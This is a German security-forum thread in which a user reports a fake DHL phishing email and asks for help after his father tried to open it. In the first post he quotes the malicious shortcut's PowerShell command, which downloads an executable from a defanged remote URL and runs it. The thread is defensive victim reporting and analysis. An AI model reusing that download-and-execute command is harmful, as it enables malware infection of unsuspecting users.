|
Plagegeister aller Art und deren Bekämpfung: Gefälschte DHL-Email und (schädliche?) InfektionWindows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen. |
14.10.2015, 23:20 | #1 |
| Gefälschte DHL-Email und (schädliche?) Infektion Hallo, Ich melde mich hier vorsorglich. Heute hat mein Vater eine Paketbestätigung erhalten, dass ein Paket abholbereit sein soll. Unachtsam wie mein Vater ist, hat er die Mail versucht zu öffnen. Da ihm das nicht gelungen ist, hat er sie an mich weitergeleitet. Die Mail sieht wie folgt aus: Betreff: "New paket!" Text: (DHL BANNER) Code:
ATTFilter Guten Tag xxxx@xxxx.de, Ihr Paket ID##### ist empfangsbereit. Diese e-mail ist eine Mitteilung für die Ankunft. Lieferung durch den Absender gezahlt. Die Hohe der Versicherungspaket € ####. Um das Sendung zu bekommen , bitte drucken Sie das angehangte Dokument und prasentieren sie in einem Lagerhaus. Paket.de – Ihr Weg zum individuellen Paketempfang und -versand DHL Paket GmbH Sträßchensweg 10 53113 Bonn Registergericht Bonn HRB 19565 USt-IdNr.: DE 813312787 Geschäftsführung: Dr. Andrej Busch Katja Herbst Norman Chmiel Heinrich Eilers Dr. Thomas Ogilvie Vorsitzender des Aufsichtsrates: Uwe Brinks Website Kontakt Impressum Datenschutz © 2015 DHL Die Datei habe Ich mal heruntergeladen und in einer VM geöffnet. Es ist eine zip-Datei, in der eine Verknüpfung zu einem .doc ist. Die Verknüpfung ist manipuliert. Sie öffnet folgenden Befehl: Code:
ATTFilter (new-object System.Net.WebClient).DownloadFile('hxxp://supportsoft777.pw/bot.exe','%TEMP%\t.exe');Start-Process "%TEMP%\t.exe Leider brachte mir das Nachforschen nichts, außer einem virustotal report (https://www.virustotal.com/de/user/mastertaco/). Virustotal von der Datei, die da nachgeladen werden soll: https://www.virustotal.com/de/file/43c91995ee9cb6319a66a21f2e6ff8b28d48bca5872ad2df97d84a653ad5e9a0/analysis/1444860978/ Ist jemandem etwas bekannt zu diesem Vorfall? Die Datei wird ja von kaum einem aktuellen Virenscanner erkannt. An den PC von meinem Vater kann Ich erst morgen ran, um ausführliche Logs zu erstellen. Gruß |
15.10.2015, 05:58 | #2 |
/// the machine /// TB-Ausbilder | Gefälschte DHL-Email und (schädliche?) Infektion Die Files ändern sich sekündlich, also kann keiner genau sagen was die machen.
__________________Bitte lade dir die passende Version von Farbar's Recovery Scan Tool auf deinen Desktop: FRST 32-Bit | FRST 64-Bit (Wenn du nicht sicher bist: Lade beide Versionen oder unter Start > Computer (Rechtsklick) > Eigenschaften nachschauen)
__________________ |
15.10.2015, 12:36 | #3 |
| Gefälschte DHL-Email und (schädliche?) Infektion Danke für die Antwort.
__________________Also erstes Symptom scheint zu sein, dass "harmlose" Software nachgeladen wird. Der PC hatte jetzt einige Male "BCWipeTM" und "Acutal Multiple Monitors" versucht zu installieren. Ich starte den PC mal neu und lege dann die Logs wie gewünscht an. |
16.10.2015, 18:30 | #4 |
/// the machine /// TB-Ausbilder | Gefälschte DHL-Email und (schädliche?) Infektion ok
__________________ gruß, schrauber Proud Member of UNITE and ASAP since 2009 Spenden Anleitungen und Hilfestellungen Trojaner-Board Facebook-Seite Keine Hilfestellung via PM! |
Themen zu Gefälschte DHL-Email und (schädliche?) Infektion |
absender, aktuelle, code, datei, dokument, e-mail, erhalte, folge, folgende, gefälschte, gen, hohe, infektion, mail, nichts, report, scan, scanner, sendung, soft, tiere, virenscan, virenscanner, virus, virustotal |